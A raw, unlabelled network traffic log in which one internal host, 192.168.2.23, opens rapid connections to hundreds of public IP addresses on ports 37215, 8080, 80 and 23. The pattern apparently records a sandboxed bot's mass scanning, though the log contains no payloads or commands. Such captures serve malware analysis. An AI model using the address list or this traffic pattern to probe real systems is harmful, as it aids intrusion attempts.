                                                              Nov 13, 2023 22:17:58.047264099 CET8013436112.125.189.106192.168.2.23
                                                              Nov 13, 2023 22:17:58.047339916 CET1343680192.168.2.23112.125.189.106
                                                              Nov 13, 2023 22:17:58.048125029 CET23231138860.138.37.223192.168.2.23
                                                              Nov 13, 2023 22:17:58.052156925 CET80801394895.217.163.199192.168.2.23
                                                              Nov 13, 2023 22:17:58.057274103 CET8013436112.120.137.17192.168.2.23
                                                              Nov 13, 2023 22:17:58.058238029 CET80801394895.95.112.208192.168.2.23
                                                              Nov 13, 2023 22:17:58.058633089 CET80801394862.65.49.100192.168.2.23
                                                              Nov 13, 2023 22:17:58.059528112 CET80801394831.13.227.193192.168.2.23
                                                              Nov 13, 2023 22:17:58.060686111 CET80801394862.176.90.187192.168.2.23
                                                              Nov 13, 2023 22:17:58.061213970 CET80801394885.16.74.208192.168.2.23
                                                              Nov 13, 2023 22:17:58.061289072 CET80801394894.103.83.127192.168.2.23
                                                              Nov 13, 2023 22:17:58.061397076 CET139488080192.168.2.2394.103.83.127
                                                              Nov 13, 2023 22:17:58.064872026 CET80801394831.136.106.179192.168.2.23
                                                              Nov 13, 2023 22:17:58.064929962 CET139488080192.168.2.2331.136.106.179
                                                              Nov 13, 2023 22:17:58.066912889 CET2311388114.223.198.109192.168.2.23
                                                              Nov 13, 2023 22:17:58.068012953 CET10244426093.123.85.5192.168.2.23
                                                              Nov 13, 2023 22:17:58.068085909 CET442601024192.168.2.2393.123.85.5
                                                              Nov 13, 2023 22:17:58.068480968 CET442601024192.168.2.2393.123.85.5
                                                              Nov 13, 2023 22:17:58.070969105 CET2311388157.231.99.37192.168.2.23
                                                              Nov 13, 2023 22:17:58.074968100 CET23231138886.48.111.203192.168.2.23
                                                              Nov 13, 2023 22:17:58.075407982 CET2311388130.83.162.116192.168.2.23
                                                              Nov 13, 2023 22:17:58.083470106 CET80801394895.197.58.29192.168.2.23
                                                              Nov 13, 2023 22:17:58.084494114 CET2311388118.195.198.31192.168.2.23
                                                              Nov 13, 2023 22:17:58.090902090 CET80801394885.234.57.1192.168.2.23
                                                              Nov 13, 2023 22:17:58.097086906 CET2311388212.70.145.133192.168.2.23
                                                              Nov 13, 2023 22:17:58.102345943 CET80801394894.43.110.254192.168.2.23
                                                              Nov 13, 2023 22:17:58.105422020 CET80801394831.146.227.194192.168.2.23
                                                              Nov 13, 2023 22:17:58.106384039 CET231138881.211.126.81192.168.2.23
                                                              Nov 13, 2023 22:17:58.122215986 CET231138879.25.196.128192.168.2.23
                                                              Nov 13, 2023 22:17:58.174056053 CET2311388151.238.176.164192.168.2.23
                                                              Nov 13, 2023 22:17:58.174274921 CET1138823192.168.2.23151.238.176.164
                                                              Nov 13, 2023 22:17:58.379206896 CET10244426093.123.85.5192.168.2.23
                                                              Nov 13, 2023 22:17:58.379425049 CET442601024192.168.2.2393.123.85.5
                                                              Nov 13, 2023 22:17:58.534352064 CET8013436112.72.174.194192.168.2.23
                                                              Nov 13, 2023 22:17:58.665523052 CET1266037215192.168.2.2341.163.190.9
                                                              Nov 13, 2023 22:17:58.665530920 CET1266037215192.168.2.2341.149.29.210
                                                              Nov 13, 2023 22:17:58.665565014 CET1266037215192.168.2.2341.167.87.24
                                                              Nov 13, 2023 22:17:58.665570021 CET1266037215192.168.2.2341.203.101.43
                                                              Nov 13, 2023 22:17:58.665592909 CET1266037215192.168.2.2341.159.148.145
                                                              Nov 13, 2023 22:17:58.665626049 CET1266037215192.168.2.2341.90.104.122
                                                              Nov 13, 2023 22:17:58.665626049 CET1266037215192.168.2.2341.30.171.183
                                                              Nov 13, 2023 22:17:58.665669918 CET1266037215192.168.2.2341.8.175.116
                                                              Nov 13, 2023 22:17:58.665671110 CET1266037215192.168.2.2341.241.61.184
                                                              Nov 13, 2023 22:17:58.665679932 CET1266037215192.168.2.2341.27.92.166
                                                              Nov 13, 2023 22:17:58.665738106 CET1266037215192.168.2.2341.212.191.141
                                                              Nov 13, 2023 22:17:58.665751934 CET1266037215192.168.2.2341.214.62.221
                                                              Nov 13, 2023 22:17:58.665771961 CET1266037215192.168.2.2341.225.2.33
                                                              Nov 13, 2023 22:17:58.665812969 CET1266037215192.168.2.2341.1.88.121
                                                              Nov 13, 2023 22:17:58.665827990 CET1266037215192.168.2.2341.218.132.192
                                                              Nov 13, 2023 22:17:58.665849924 CET1266037215192.168.2.2341.204.175.103
                                                              Nov 13, 2023 22:17:58.665860891 CET1266037215192.168.2.2341.129.238.162
                                                              Nov 13, 2023 22:17:58.665862083 CET1266037215192.168.2.2341.2.156.38
                                                              Nov 13, 2023 22:17:58.665874004 CET1266037215192.168.2.2341.199.132.187
                                                              Nov 13, 2023 22:17:58.665894985 CET1266037215192.168.2.2341.19.77.29
                                                              Nov 13, 2023 22:17:58.665918112 CET1266037215192.168.2.2341.216.230.69
                                                              Nov 13, 2023 22:17:58.665930033 CET1266037215192.168.2.2341.218.131.194
                                                              Nov 13, 2023 22:17:58.665975094 CET1266037215192.168.2.2341.235.247.63
                                                              Nov 13, 2023 22:17:58.665980101 CET1266037215192.168.2.2341.103.242.74
                                                              Nov 13, 2023 22:17:58.666023970 CET1266037215192.168.2.2341.216.76.80
                                                              Nov 13, 2023 22:17:58.666023970 CET1266037215192.168.2.2341.250.89.245
                                                              Nov 13, 2023 22:17:58.666033030 CET1266037215192.168.2.2341.235.229.109
                                                              Nov 13, 2023 22:17:58.666058064 CET1266037215192.168.2.2341.25.105.35
                                                              Nov 13, 2023 22:17:58.666059017 CET1266037215192.168.2.2341.202.75.191
                                                              Nov 13, 2023 22:17:58.666105986 CET1266037215192.168.2.2341.233.67.59
                                                              Nov 13, 2023 22:17:58.666153908 CET1266037215192.168.2.2341.236.225.126
                                                              Nov 13, 2023 22:17:58.666176081 CET1266037215192.168.2.2341.197.174.110
                                                              Nov 13, 2023 22:17:58.666177034 CET1266037215192.168.2.2341.105.248.228
                                                              Nov 13, 2023 22:17:58.666177988 CET1266037215192.168.2.2341.174.241.3
                                                              Nov 13, 2023 22:17:58.666240931 CET1266037215192.168.2.2341.128.145.77
                                                              Nov 13, 2023 22:17:58.666241884 CET1266037215192.168.2.2341.153.73.193
                                                              Nov 13, 2023 22:17:58.666243076 CET1266037215192.168.2.2341.121.114.192
                                                              Nov 13, 2023 22:17:58.666258097 CET1266037215192.168.2.2341.146.154.174
                                                              Nov 13, 2023 22:17:58.666323900 CET1266037215192.168.2.2341.203.148.196
                                                              Nov 13, 2023 22:17:58.666327000 CET1266037215192.168.2.2341.171.45.93
                                                              Nov 13, 2023 22:17:58.666335106 CET1266037215192.168.2.2341.199.191.75
                                                              Nov 13, 2023 22:17:58.666344881 CET1266037215192.168.2.2341.102.125.35
                                                              Nov 13, 2023 22:17:58.666364908 CET1266037215192.168.2.2341.196.183.187
                                                              Nov 13, 2023 22:17:58.666402102 CET1266037215192.168.2.2341.236.177.57
                                                              Nov 13, 2023 22:17:58.666444063 CET1266037215192.168.2.2341.231.234.55
                                                              Nov 13, 2023 22:17:58.666444063 CET1266037215192.168.2.2341.209.36.240
                                                              Nov 13, 2023 22:17:58.666444063 CET1266037215192.168.2.2341.210.141.73
                                                              Nov 13, 2023 22:17:58.666464090 CET1266037215192.168.2.2341.33.140.229
                                                              Nov 13, 2023 22:17:58.666542053 CET1266037215192.168.2.2341.125.184.230
                                                              Nov 13, 2023 22:17:58.666543007 CET1266037215192.168.2.2341.245.122.27
                                                              Nov 13, 2023 22:17:58.666564941 CET1266037215192.168.2.2341.75.100.217
                                                              Nov 13, 2023 22:17:58.666564941 CET1266037215192.168.2.2341.126.238.146
                                                              Nov 13, 2023 22:17:58.666564941 CET1266037215192.168.2.2341.170.231.138
                                                              Nov 13, 2023 22:17:58.666601896 CET1266037215192.168.2.2341.6.111.114
                                                              Nov 13, 2023 22:17:58.666618109 CET1266037215192.168.2.2341.116.227.230
                                                              Nov 13, 2023 22:17:58.666621923 CET1266037215192.168.2.2341.206.166.94
                                                              Nov 13, 2023 22:17:58.666640997 CET1266037215192.168.2.2341.250.251.62
                                                              Nov 13, 2023 22:17:58.666656017 CET1266037215192.168.2.2341.75.170.145
                                                              Nov 13, 2023 22:17:58.666699886 CET1266037215192.168.2.2341.129.185.54
                                                              Nov 13, 2023 22:17:58.666732073 CET1266037215192.168.2.2341.170.208.179
                                                              Nov 13, 2023 22:17:58.666732073 CET1266037215192.168.2.2341.139.106.235
                                                              Nov 13, 2023 22:17:58.666734934 CET1266037215192.168.2.2341.230.80.222
                                                              Nov 13, 2023 22:17:58.666776896 CET1266037215192.168.2.2341.244.212.96
                                                              Nov 13, 2023 22:17:58.666779995 CET1266037215192.168.2.2341.226.70.17
                                                              Nov 13, 2023 22:17:58.666794062 CET1266037215192.168.2.2341.219.166.138
                                                              Nov 13, 2023 22:17:58.666846037 CET1266037215192.168.2.2341.137.55.93
                                                              Nov 13, 2023 22:17:58.666862965 CET1266037215192.168.2.2341.116.110.79
                                                              Nov 13, 2023 22:17:58.666871071 CET1266037215192.168.2.2341.212.148.162
                                                              Nov 13, 2023 22:17:58.666881084 CET1266037215192.168.2.2341.120.32.200
                                                              Nov 13, 2023 22:17:58.666908026 CET1266037215192.168.2.2341.177.31.194
                                                              Nov 13, 2023 22:17:58.666924000 CET1266037215192.168.2.2341.160.35.119
                                                              Nov 13, 2023 22:17:58.666969061 CET1266037215192.168.2.2341.5.208.198
                                                              Nov 13, 2023 22:17:58.666980982 CET1266037215192.168.2.2341.32.19.120
                                                              Nov 13, 2023 22:17:58.667016029 CET1266037215192.168.2.2341.29.233.48
                                                              Nov 13, 2023 22:17:58.667016029 CET1266037215192.168.2.2341.168.73.36
                                                              Nov 13, 2023 22:17:58.667068958 CET1266037215192.168.2.2341.151.100.95
                                                              Nov 13, 2023 22:17:58.667071104 CET1266037215192.168.2.2341.4.44.158
                                                              Nov 13, 2023 22:17:58.667098999 CET1266037215192.168.2.2341.230.5.218
                                                              Nov 13, 2023 22:17:58.667124033 CET1266037215192.168.2.2341.204.213.195
                                                              Nov 13, 2023 22:17:58.667128086 CET1266037215192.168.2.2341.237.90.158
                                                              Nov 13, 2023 22:17:58.667171001 CET1266037215192.168.2.2341.141.210.36
                                                              Nov 13, 2023 22:17:58.667218924 CET1266037215192.168.2.2341.57.232.18
                                                              Nov 13, 2023 22:17:58.667253971 CET1266037215192.168.2.2341.39.40.190
                                                              Nov 13, 2023 22:17:58.667306900 CET1266037215192.168.2.2341.62.194.225
                                                              Nov 13, 2023 22:17:58.667363882 CET1266037215192.168.2.2341.163.192.50
                                                              Nov 13, 2023 22:17:58.667363882 CET1266037215192.168.2.2341.20.65.105
                                                              Nov 13, 2023 22:17:58.667380095 CET1266037215192.168.2.2341.184.192.186
                                                              Nov 13, 2023 22:17:58.667424917 CET1266037215192.168.2.2341.240.191.78
                                                              Nov 13, 2023 22:17:58.667424917 CET1266037215192.168.2.2341.54.34.228
                                                              Nov 13, 2023 22:17:58.667424917 CET1266037215192.168.2.2341.206.22.62
                                                              Nov 13, 2023 22:17:58.667424917 CET1266037215192.168.2.2341.16.91.245
                                                              Nov 13, 2023 22:17:58.667424917 CET1266037215192.168.2.2341.156.139.28
                                                              Nov 13, 2023 22:17:58.667424917 CET1266037215192.168.2.2341.83.248.100
                                                              Nov 13, 2023 22:17:58.667444944 CET1266037215192.168.2.2341.29.54.87
                                                              Nov 13, 2023 22:17:58.667489052 CET1266037215192.168.2.2341.91.226.214
                                                              Nov 13, 2023 22:17:58.667490005 CET1266037215192.168.2.2341.170.149.135
                                                              Nov 13, 2023 22:17:58.667529106 CET1266037215192.168.2.2341.174.136.108
                                                              Nov 13, 2023 22:17:58.667531013 CET1266037215192.168.2.2341.202.76.117
                                                              Nov 13, 2023 22:17:58.667581081 CET1266037215192.168.2.2341.151.214.22
                                                              Nov 13, 2023 22:17:58.667582989 CET1266037215192.168.2.2341.114.170.170
                                                              Nov 13, 2023 22:17:58.667656898 CET1266037215192.168.2.2341.164.104.127
                                                              Nov 13, 2023 22:17:58.667685986 CET1266037215192.168.2.2341.60.80.250
                                                              Nov 13, 2023 22:17:58.667710066 CET1266037215192.168.2.2341.22.25.118
                                                              Nov 13, 2023 22:17:58.667716026 CET1266037215192.168.2.2341.110.45.163
                                                              Nov 13, 2023 22:17:58.667741060 CET1266037215192.168.2.2341.234.251.21
                                                              Nov 13, 2023 22:17:58.667764902 CET1266037215192.168.2.2341.132.233.8
                                                              Nov 13, 2023 22:17:58.667773008 CET1266037215192.168.2.2341.24.202.59
                                                              Nov 13, 2023 22:17:58.667783022 CET1266037215192.168.2.2341.103.117.115
                                                              Nov 13, 2023 22:17:58.667817116 CET1266037215192.168.2.2341.67.83.246
                                                              Nov 13, 2023 22:17:58.667818069 CET1266037215192.168.2.2341.117.217.156
                                                              Nov 13, 2023 22:17:58.667855024 CET1266037215192.168.2.2341.120.196.243
                                                              Nov 13, 2023 22:17:58.667872906 CET1266037215192.168.2.2341.156.155.210
                                                              Nov 13, 2023 22:17:58.667895079 CET1266037215192.168.2.2341.98.221.164
                                                              Nov 13, 2023 22:17:58.667905092 CET1266037215192.168.2.2341.152.16.210
                                                              Nov 13, 2023 22:17:58.667949915 CET1266037215192.168.2.2341.49.120.255
                                                              Nov 13, 2023 22:17:58.667951107 CET1266037215192.168.2.2341.211.82.14
                                                              Nov 13, 2023 22:17:58.667992115 CET1266037215192.168.2.2341.29.15.247
                                                              Nov 13, 2023 22:17:58.667994022 CET1266037215192.168.2.2341.240.89.201
                                                              Nov 13, 2023 22:17:58.668005943 CET1266037215192.168.2.2341.194.150.154
                                                              Nov 13, 2023 22:17:58.668024063 CET1266037215192.168.2.2341.233.183.181
                                                              Nov 13, 2023 22:17:58.668045044 CET1266037215192.168.2.2341.93.222.217
                                                              Nov 13, 2023 22:17:58.668066025 CET1266037215192.168.2.2341.133.130.20
                                                              Nov 13, 2023 22:17:58.668117046 CET1266037215192.168.2.2341.249.36.250
                                                              Nov 13, 2023 22:17:58.668127060 CET1266037215192.168.2.2341.180.218.112
                                                              Nov 13, 2023 22:17:58.668138027 CET1266037215192.168.2.2341.182.12.134
                                                              Nov 13, 2023 22:17:58.668153048 CET1266037215192.168.2.2341.39.177.103
                                                              Nov 13, 2023 22:17:58.668229103 CET1266037215192.168.2.2341.126.178.163
                                                              Nov 13, 2023 22:17:58.668268919 CET1266037215192.168.2.2341.14.221.88
                                                              Nov 13, 2023 22:17:58.668273926 CET1266037215192.168.2.2341.71.63.146
                                                              Nov 13, 2023 22:17:58.668273926 CET1266037215192.168.2.2341.254.137.107
                                                              Nov 13, 2023 22:17:58.668315887 CET1266037215192.168.2.2341.162.79.239
                                                              Nov 13, 2023 22:17:58.668373108 CET1266037215192.168.2.2341.14.75.60
                                                              Nov 13, 2023 22:17:58.668374062 CET1266037215192.168.2.2341.109.68.164
                                                              Nov 13, 2023 22:17:58.668399096 CET1266037215192.168.2.2341.209.40.185
                                                              Nov 13, 2023 22:17:58.668426991 CET1266037215192.168.2.2341.55.254.9
                                                              Nov 13, 2023 22:17:58.668427944 CET1266037215192.168.2.2341.246.184.199
                                                              Nov 13, 2023 22:17:58.668472052 CET1266037215192.168.2.2341.92.240.155
                                                              Nov 13, 2023 22:17:58.668473005 CET1266037215192.168.2.2341.154.249.54
                                                              Nov 13, 2023 22:17:58.668473005 CET1266037215192.168.2.2341.69.102.57
                                                              Nov 13, 2023 22:17:58.668514967 CET1266037215192.168.2.2341.176.240.62
                                                              Nov 13, 2023 22:17:58.668514967 CET1266037215192.168.2.2341.43.40.118
                                                              Nov 13, 2023 22:17:58.668531895 CET1266037215192.168.2.2341.247.20.93
                                                              Nov 13, 2023 22:17:58.668550968 CET1266037215192.168.2.2341.77.221.104
                                                              Nov 13, 2023 22:17:58.668586016 CET1266037215192.168.2.2341.217.164.69
                                                              Nov 13, 2023 22:17:58.668605089 CET1266037215192.168.2.2341.175.92.141
                                                              Nov 13, 2023 22:17:58.668605089 CET1266037215192.168.2.2341.133.162.216
                                                              Nov 13, 2023 22:17:58.668625116 CET1266037215192.168.2.2341.168.37.193
                                                              Nov 13, 2023 22:17:58.668659925 CET1266037215192.168.2.2341.116.149.231
                                                              Nov 13, 2023 22:17:58.668729067 CET1266037215192.168.2.2341.238.110.130
                                                              Nov 13, 2023 22:17:58.668730021 CET1266037215192.168.2.2341.182.84.243
                                                              Nov 13, 2023 22:17:58.668790102 CET1266037215192.168.2.2341.98.141.14
                                                              Nov 13, 2023 22:17:58.668790102 CET1266037215192.168.2.2341.238.78.245
                                                              Nov 13, 2023 22:17:58.668812037 CET1266037215192.168.2.2341.236.168.5
                                                              Nov 13, 2023 22:17:58.668812037 CET1266037215192.168.2.2341.72.70.200
                                                              Nov 13, 2023 22:17:58.668843031 CET1266037215192.168.2.2341.74.61.117
                                                              Nov 13, 2023 22:17:58.668843985 CET1266037215192.168.2.2341.46.159.97
                                                              Nov 13, 2023 22:17:58.668843985 CET1266037215192.168.2.2341.127.94.131
                                                              Nov 13, 2023 22:17:58.668996096 CET1266037215192.168.2.2341.125.97.200
                                                              Nov 13, 2023 22:17:58.668997049 CET1266037215192.168.2.2341.147.37.250
                                                              Nov 13, 2023 22:17:58.669094086 CET1266037215192.168.2.2341.148.199.137
                                                              Nov 13, 2023 22:17:58.690212011 CET10244426093.123.85.5192.168.2.23
                                                              Nov 13, 2023 22:17:58.732433081 CET139488080192.168.2.2362.14.230.236
                                                              Nov 13, 2023 22:17:58.732465982 CET139488080192.168.2.2395.134.208.188
                                                              Nov 13, 2023 22:17:58.732466936 CET139488080192.168.2.2394.77.164.148
                                                              Nov 13, 2023 22:17:58.732465982 CET139488080192.168.2.2331.218.49.59
                                                              Nov 13, 2023 22:17:58.732471943 CET139488080192.168.2.2385.138.221.82
                                                              Nov 13, 2023 22:17:58.732491016 CET139488080192.168.2.2331.218.189.137
                                                              Nov 13, 2023 22:17:58.732502937 CET139488080192.168.2.2385.125.26.94
                                                              Nov 13, 2023 22:17:58.732503891 CET139488080192.168.2.2362.214.200.29
                                                              Nov 13, 2023 22:17:58.732511044 CET139488080192.168.2.2394.236.17.7
                                                              Nov 13, 2023 22:17:58.732511997 CET139488080192.168.2.2362.179.157.214
                                                              Nov 13, 2023 22:17:58.732520103 CET139488080192.168.2.2362.45.6.201
                                                              Nov 13, 2023 22:17:58.732525110 CET139488080192.168.2.2331.233.206.223
                                                              Nov 13, 2023 22:17:58.732525110 CET139488080192.168.2.2331.167.143.147
                                                              Nov 13, 2023 22:17:58.732547045 CET139488080192.168.2.2394.140.107.159
                                                              Nov 13, 2023 22:17:58.732547045 CET139488080192.168.2.2394.135.191.201
                                                              Nov 13, 2023 22:17:58.732547045 CET139488080192.168.2.2362.174.98.12
                                                              Nov 13, 2023 22:17:58.732553959 CET139488080192.168.2.2385.229.102.75
                                                              Nov 13, 2023 22:17:58.732553959 CET139488080192.168.2.2331.214.190.107
                                                              Nov 13, 2023 22:17:58.732553959 CET139488080192.168.2.2362.145.200.109
                                                              Nov 13, 2023 22:17:58.732564926 CET139488080192.168.2.2362.215.211.251
                                                              Nov 13, 2023 22:17:58.732564926 CET139488080192.168.2.2395.60.11.161
                                                              Nov 13, 2023 22:17:58.732564926 CET139488080192.168.2.2331.0.34.126
                                                              Nov 13, 2023 22:17:58.732564926 CET139488080192.168.2.2362.46.152.62
                                                              Nov 13, 2023 22:17:58.732572079 CET139488080192.168.2.2394.34.146.110
                                                              Nov 13, 2023 22:17:58.732578039 CET139488080192.168.2.2395.46.29.65
                                                              Nov 13, 2023 22:17:58.732578039 CET139488080192.168.2.2385.200.206.66
                                                              Nov 13, 2023 22:17:58.732578039 CET1343680192.168.2.2388.214.223.33
                                                              Nov 13, 2023 22:17:58.732585907 CET139488080192.168.2.2331.226.184.105
                                                              Nov 13, 2023 22:17:58.732585907 CET139488080192.168.2.2395.19.247.0
                                                              Nov 13, 2023 22:17:58.732585907 CET139488080192.168.2.2394.144.4.26
                                                              Nov 13, 2023 22:17:58.732585907 CET139488080192.168.2.2331.219.30.81
                                                              Nov 13, 2023 22:17:58.732590914 CET1343680192.168.2.2388.191.192.92
                                                              Nov 13, 2023 22:17:58.732590914 CET139488080192.168.2.2385.57.138.137
                                                              Nov 13, 2023 22:17:58.732599020 CET139488080192.168.2.2331.101.156.53
                                                              Nov 13, 2023 22:17:58.732599020 CET139488080192.168.2.2362.66.26.60
                                                              Nov 13, 2023 22:17:58.732606888 CET1343680192.168.2.2388.113.32.238
                                                              Nov 13, 2023 22:17:58.732608080 CET139488080192.168.2.2385.128.53.123
                                                              Nov 13, 2023 22:17:58.732623100 CET139488080192.168.2.2385.65.137.239
                                                              Nov 13, 2023 22:17:58.732623100 CET139488080192.168.2.2394.155.208.154
                                                              Nov 13, 2023 22:17:58.732625008 CET139488080192.168.2.2385.59.87.44
                                                              Nov 13, 2023 22:17:58.732625008 CET139488080192.168.2.2362.16.141.177
                                                              Nov 13, 2023 22:17:58.732625008 CET139488080192.168.2.2331.150.58.80
                                                              Nov 13, 2023 22:17:58.732637882 CET139488080192.168.2.2385.22.0.145
                                                              Nov 13, 2023 22:17:58.732637882 CET139488080192.168.2.2395.89.117.216
                                                              Nov 13, 2023 22:17:58.732646942 CET1343680192.168.2.2388.74.229.206
                                                              Nov 13, 2023 22:17:58.732646942 CET1343680192.168.2.2388.203.193.168
                                                              Nov 13, 2023 22:17:58.732655048 CET139488080192.168.2.2362.231.59.49
                                                              Nov 13, 2023 22:17:58.732661009 CET139488080192.168.2.2385.144.73.182
                                                              Nov 13, 2023 22:17:58.732661963 CET139488080192.168.2.2394.179.10.56
                                                              Nov 13, 2023 22:17:58.732665062 CET139488080192.168.2.2385.249.220.232
                                                              Nov 13, 2023 22:17:58.732676029 CET139488080192.168.2.2394.157.195.154
                                                              Nov 13, 2023 22:17:58.732678890 CET139488080192.168.2.2362.48.206.111
                                                              Nov 13, 2023 22:17:58.732678890 CET139488080192.168.2.2385.93.69.161
                                                              Nov 13, 2023 22:17:58.732678890 CET1343680192.168.2.2388.142.144.56
                                                              Nov 13, 2023 22:17:58.732697010 CET139488080192.168.2.2362.230.111.157
                                                              Nov 13, 2023 22:17:58.732697010 CET139488080192.168.2.2395.62.209.48
                                                              Nov 13, 2023 22:17:58.732697964 CET1343680192.168.2.2388.234.146.112
                                                              Nov 13, 2023 22:17:58.732701063 CET139488080192.168.2.2385.45.181.214
                                                              Nov 13, 2023 22:17:58.732707977 CET139488080192.168.2.2394.175.32.63
                                                              Nov 13, 2023 22:17:58.732708931 CET139488080192.168.2.2331.22.64.106
                                                              Nov 13, 2023 22:17:58.732707977 CET139488080192.168.2.2385.40.38.191
                                                              Nov 13, 2023 22:17:58.732707977 CET139488080192.168.2.2394.93.86.200
                                                              Nov 13, 2023 22:17:58.732707977 CET139488080192.168.2.2362.141.52.170
                                                              Nov 13, 2023 22:17:58.732707977 CET1343680192.168.2.2388.102.185.58
                                                              Nov 13, 2023 22:17:58.732716084 CET139488080192.168.2.2362.148.170.49
                                                              Nov 13, 2023 22:17:58.732717037 CET139488080192.168.2.2395.5.180.36
                                                              Nov 13, 2023 22:17:58.732718945 CET139488080192.168.2.2385.135.157.119
                                                              Nov 13, 2023 22:17:58.732733011 CET1343680192.168.2.2388.227.32.179
                                                              Nov 13, 2023 22:17:58.732733965 CET139488080192.168.2.2394.2.86.26
                                                              Nov 13, 2023 22:17:58.732741117 CET139488080192.168.2.2385.139.15.186
                                                              Nov 13, 2023 22:17:58.732741117 CET1343680192.168.2.2388.152.209.194
                                                              Nov 13, 2023 22:17:58.732741117 CET139488080192.168.2.2385.255.93.33
                                                              Nov 13, 2023 22:17:58.732758045 CET139488080192.168.2.2362.15.81.119
                                                              Nov 13, 2023 22:17:58.732760906 CET139488080192.168.2.2395.199.47.34
                                                              Nov 13, 2023 22:17:58.732762098 CET139488080192.168.2.2394.47.21.104
                                                              Nov 13, 2023 22:17:58.732760906 CET1343680192.168.2.2388.218.105.5
                                                              Nov 13, 2023 22:17:58.732762098 CET139488080192.168.2.2394.177.212.2
                                                              Nov 13, 2023 22:17:58.732762098 CET139488080192.168.2.2331.125.105.26
                                                              Nov 13, 2023 22:17:58.732774973 CET1343680192.168.2.2388.177.175.22
                                                              Nov 13, 2023 22:17:58.732780933 CET139488080192.168.2.2395.100.41.62
                                                              Nov 13, 2023 22:17:58.732788086 CET139488080192.168.2.2395.143.200.74
                                                              Nov 13, 2023 22:17:58.732788086 CET139488080192.168.2.2395.10.124.155
                                                              Nov 13, 2023 22:17:58.732789040 CET139488080192.168.2.2395.216.196.97
                                                              Nov 13, 2023 22:17:58.732789040 CET139488080192.168.2.2394.194.94.129
                                                              Nov 13, 2023 22:17:58.732791901 CET139488080192.168.2.2385.139.210.7
                                                              Nov 13, 2023 22:17:58.732791901 CET139488080192.168.2.2385.137.182.103
                                                              Nov 13, 2023 22:17:58.732803106 CET139488080192.168.2.2395.191.18.200
                                                              Nov 13, 2023 22:17:58.732803106 CET139488080192.168.2.2395.212.201.103
                                                              Nov 13, 2023 22:17:58.732819080 CET1343680192.168.2.2388.108.31.221
                                                              Nov 13, 2023 22:17:58.732821941 CET139488080192.168.2.2394.126.13.33
                                                              Nov 13, 2023 22:17:58.732821941 CET139488080192.168.2.2362.190.210.233
                                                              Nov 13, 2023 22:17:58.732821941 CET139488080192.168.2.2394.27.229.46
                                                              Nov 13, 2023 22:17:58.732829094 CET139488080192.168.2.2395.91.233.210
                                                              Nov 13, 2023 22:17:58.732834101 CET1343680192.168.2.2388.163.102.66
                                                              Nov 13, 2023 22:17:58.732834101 CET139488080192.168.2.2395.30.197.117
                                                              Nov 13, 2023 22:17:58.732837915 CET139488080192.168.2.2362.129.57.227
                                                              Nov 13, 2023 22:17:58.732850075 CET139488080192.168.2.2395.245.71.117
                                                              Nov 13, 2023 22:17:58.732851982 CET139488080192.168.2.2362.205.8.122
                                                              Nov 13, 2023 22:17:58.732851982 CET1343680192.168.2.2388.109.155.155
                                                              Nov 13, 2023 22:17:58.732866049 CET139488080192.168.2.2394.244.88.96
                                                              Nov 13, 2023 22:17:58.732866049 CET139488080192.168.2.2362.75.168.100
                                                              Nov 13, 2023 22:17:58.732867002 CET139488080192.168.2.2394.82.82.74
                                                              Nov 13, 2023 22:17:58.732889891 CET139488080192.168.2.2395.173.79.18
                                                              Nov 13, 2023 22:17:58.732891083 CET1343680192.168.2.2388.96.233.0
                                                              Nov 13, 2023 22:17:58.732892036 CET139488080192.168.2.2362.216.209.182
                                                              Nov 13, 2023 22:17:58.732892990 CET1343680192.168.2.2388.174.196.187
                                                              Nov 13, 2023 22:17:58.732892990 CET139488080192.168.2.2331.255.221.253
                                                              Nov 13, 2023 22:17:58.732892990 CET139488080192.168.2.2394.164.41.70
                                                              Nov 13, 2023 22:17:58.732893944 CET139488080192.168.2.2394.184.117.62
                                                              Nov 13, 2023 22:17:58.732893944 CET139488080192.168.2.2385.150.1.50
                                                              Nov 13, 2023 22:17:58.732896090 CET139488080192.168.2.2394.141.49.148
                                                              Nov 13, 2023 22:17:58.732896090 CET139488080192.168.2.2385.82.119.18
                                                              Nov 13, 2023 22:17:58.732897997 CET1343680192.168.2.2388.175.191.164
                                                              Nov 13, 2023 22:17:58.732898951 CET139488080192.168.2.2331.30.26.47
                                                              Nov 13, 2023 22:17:58.732897997 CET139488080192.168.2.2394.66.190.157
                                                              Nov 13, 2023 22:17:58.732922077 CET139488080192.168.2.2385.246.130.104
                                                              Nov 13, 2023 22:17:58.732922077 CET1343680192.168.2.2388.4.65.239
                                                              Nov 13, 2023 22:17:58.732923985 CET139488080192.168.2.2385.58.151.124
                                                              Nov 13, 2023 22:17:58.732929945 CET139488080192.168.2.2385.243.167.165
                                                              Nov 13, 2023 22:17:58.732929945 CET139488080192.168.2.2385.95.1.233
                                                              Nov 13, 2023 22:17:58.732932091 CET1343680192.168.2.2388.79.36.42
                                                              Nov 13, 2023 22:17:58.732932091 CET139488080192.168.2.2385.45.177.19
                                                              Nov 13, 2023 22:17:58.732945919 CET139488080192.168.2.2385.81.96.208
                                                              Nov 13, 2023 22:17:58.732948065 CET139488080192.168.2.2362.244.30.82
                                                              Nov 13, 2023 22:17:58.732948065 CET139488080192.168.2.2395.39.13.180
                                                              Nov 13, 2023 22:17:58.732954025 CET1343680192.168.2.2388.105.118.116
                                                              Nov 13, 2023 22:17:58.732956886 CET139488080192.168.2.2362.192.21.146
                                                              Nov 13, 2023 22:17:58.732960939 CET139488080192.168.2.2395.105.58.130
                                                              Nov 13, 2023 22:17:58.732971907 CET139488080192.168.2.2385.160.191.165
                                                              Nov 13, 2023 22:17:58.732974052 CET1343680192.168.2.2388.93.116.240
                                                              Nov 13, 2023 22:17:58.732974052 CET139488080192.168.2.2395.19.235.201
                                                              Nov 13, 2023 22:17:58.732975960 CET139488080192.168.2.2385.182.238.233
                                                              Nov 13, 2023 22:17:58.732976913 CET1343680192.168.2.2388.218.29.59
                                                              Nov 13, 2023 22:17:58.732978106 CET139488080192.168.2.2395.70.199.163
                                                              Nov 13, 2023 22:17:58.732978106 CET139488080192.168.2.2362.69.47.164
                                                              Nov 13, 2023 22:17:58.732978106 CET139488080192.168.2.2362.11.183.14
                                                              Nov 13, 2023 22:17:58.732978106 CET139488080192.168.2.2394.252.0.228
                                                              Nov 13, 2023 22:17:58.732997894 CET139488080192.168.2.2362.162.6.59
                                                              Nov 13, 2023 22:17:58.733001947 CET139488080192.168.2.2331.136.252.65
                                                              Nov 13, 2023 22:17:58.733012915 CET139488080192.168.2.2385.186.254.104
                                                              Nov 13, 2023 22:17:58.733014107 CET139488080192.168.2.2331.105.158.57
                                                              Nov 13, 2023 22:17:58.733015060 CET139488080192.168.2.2362.174.226.106
